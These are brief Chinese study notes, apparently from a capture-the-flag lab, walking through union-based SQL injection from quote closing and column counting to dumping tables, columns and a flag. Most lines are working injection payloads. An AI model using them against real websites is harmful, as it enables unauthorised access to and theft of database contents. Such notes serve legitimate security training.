1.使用单引号和双引号,哪个报错用哪个进行闭合
2.判断字段数(列数)
order by 1 按照第一个字段的顺序来排序
order by N 判断字段数,判断列数
使用二分法尝试
3.显示回显点
-1' union select 1,2,3--+有几个列名就写几个数
4.替换数字,爆出信息,版本、数据库,表名,数据
-1' union select database(),user(),version--+ 爆库
-1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# 爆表
-1' union select 1,database(),group_concat(column_name),4 from information_schema.columns where table_name='fl4g'# 爆字段
-1' union select 1,database(),group_concat(skctf_flag),4 from fl4g# 爆数据